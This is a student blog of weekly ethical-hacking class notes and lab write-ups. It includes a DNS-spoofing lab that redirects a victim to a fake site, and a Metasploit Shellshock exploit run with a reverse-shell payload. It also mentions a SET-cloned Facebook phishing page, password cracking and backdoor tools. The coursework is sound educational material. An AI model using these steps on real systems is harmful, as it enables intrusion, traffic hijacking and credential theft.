Ethical Hacking Blog

In this post I will be explaining the lab I was given to complete with steps and screenshots on how to complete them. I was instructed to

-Take over the victim’s connection using Kali Linux

-After you taking over, try to ping previous websites from the victim and make sure if the IPs already changed to Kali’sIP

-From the Victim, try to open websites and make sure that you can see the fake website not the real one.

-Record every activities you perform with screenshot (video is a plus)

1.Find IP of your machine

2.Find IP of victim’s machine

3.Make file containing your machine’s IP and the domain you want to intercept

4.Start apache server

5.Start dnsspoof

6.Access domain from victim machine

7.Compare IP address of real domain and spoofed domain (Real google IP: 8.8.8.8)

In this post i will be explaining what I learned on the eleventh week of the class session. In this weeks’ class session the topic discussed was on maintaining access. The topic discussed includes why we have to maintain access and how to maintain the access. Backdooring and tunneling were also discussed, their definitions and the types of backdooring. This includes OS backdoors and also web based backdoors, OS backdoors mentioned were Intersect and Meterpreter (Metasploit) backdoor. Tunneling examples were also given, which include dns2tcp, iodine, nc/netcat, proxychains, and also ptunnel. Web based backdooring works best when the target is a web based application. That was about all I learned in this eleventh session of the class.

In this post i will be explaining what I learned on the tenth week of the class session. In this weeks’ session the topic discussed was on privilege escalating. I also learned about type of password attacks, offline and  online cracking tools, and ARP spoofing. The examples of offline cracking tools given were Rainbowcrack, John The Ripper, Ophcrack, and Crunch and the examples given for online cracking tool were BruteSSH, Hydra, Dsniff, TCPdump, and Wireshark. The goal given for the study of network spoofing  was to perform a “Man in The Middle Attack” which could be done with Arpspoof and Ettercap. That concludes the things I learned on the tenth week of the class session.

In this post i will be explaining what i did for the third lab assignment given on the ninth week.

Here were the steps i went through:

First of all, I changed the network to NatNetwork so that the 2 OS has different IPs. Then proceed to use ifconfig to find both IPs.

-Then we use the command #msfconsole

-Next, we use commands:

-Use exploit/multi/http/apache_mod_cgi_bash_env_exec

-When we then show options, there are things that are listed as required which means needs to be filled.

-Then, we set the RHOST which is the target machine’s IP address

-We then use the command #TARGETURI /cgi-bin/status

-Next, we use set payload linux/x86/shell/reverse_tcp

-We then set our LHOST as our own virtual machine, and set the port of the virtual machine.

-As we can see, now it says when we use the command “check” it says the target is vulnerable

-When the target is vulnerable, we then use “exploit” to exploit the target.

In this blog post I will be explaining what I learned of the ninth session of the ethical hacking class. In this weeks session the topic I learned was about target exploitation and exploiting vulnerabilities. I learned what exploits were and why they were useful and about vulnerability research. Doing vulnerability research however requires a certain skill set, some of the skills required are Programming skills, such as C/C++, Perl, Python, and Assembly and Reverse Engineering. Exploits are mostly already listed in sites made public some of the site lists are http://www.securityfocus.com, http://osvdb.org, and http://www.packetstormsecurity.org . That was about all I learned in this weeks class session.

In this blog post I will be explaining what I learned of the eight session of the ethical hacking class. In this session of the class the topic was about social engineering how to identify social attack process and methods and also how to apply social engineering toolkits to a simulated victim. I also learned about human psychology, and the attack process of social engineering. The tools I used were the Social Engineering Toolkit (SET) and the Common User Password Profiler (CUPP). Lastly i had to do a practical assignment in making a fake website (facebook.com) using the SET. That was all I learned during the eight session of this class.

In this blog post I will be explaining what I learned of the seventh session of the ethical hacking class. In this week I had a lab to complete and in this lab assignment, we were asked to make our own digital certification in our kali linux to be used to access through networks securities.

The steps I had to go through for this lab were:

-I was first asked to make our own digital certificate

-I was then asked to use a specific command line to write the RSA key

-Because of using the newest version of burp suite, which is version 1.7.36, I was then asked to downgrade our java to make it compatible

-Then, by importing the digital certificate to the web browser and restarting burp suite, our own digital certification could be used with a secured connection

This concludes what I did and learn on my seventh week of class

In this blog post I will be explaining what I learned of the sixth session of the ethical hacking class. In this session of the class the topic discussed is vulnerability mapping. Types of vulnerability and the tools used for vulnerability mapping were also discussed. Some of the tools discussed are OpenVAS, Nessus, Sqlmap, Fortify, and Metasploit the tools mentioned are commercial but some of them are also free to use. I also learned how to analyze vulnerability, mapping vulnerabilities with risks and how to use and set up burp suite. This concludes the things I learned on the sixth session of the class.

In this blog post I will be explaining what I learned of the fifth session of the ethical hacking class. In this session the topic being discussed was on enumerating a target/targets. We discussed the definition of enumeration, port scanning & footprinting, and tools used for enumerating microsoft OSs. Other than microsoft OS enumeration there is also service enumeration using Amap, Httprint,  Httsquash, and Ike-scan. The tools for enumerating microsoft OSs is NBT (NetBios over TCP/IP). I also learned the basics of NetBios and the installation of NBTscan. Some other tools of enumeration are NetScanToolsPro, DumpSec, Hyena, and NessusWX. That sums up what I learned on the fifth session of the class.

In this blog post I will be explaining what I learned of the fourth session of the ethical hacking class. In this fourth session I learned about how to find the real Ip of a website even if it is protected behind a firewall, finding out old record of websites and using them as vulnerabilities, applying the available tools to identify the target machine, applying the available tools to perform OS fingerprinting, and generalizing the findings of the target discovery technique. The tools used for this topic were dnstrails.com, and robtex.com. That concludes the things i learned of the fourth session of the class.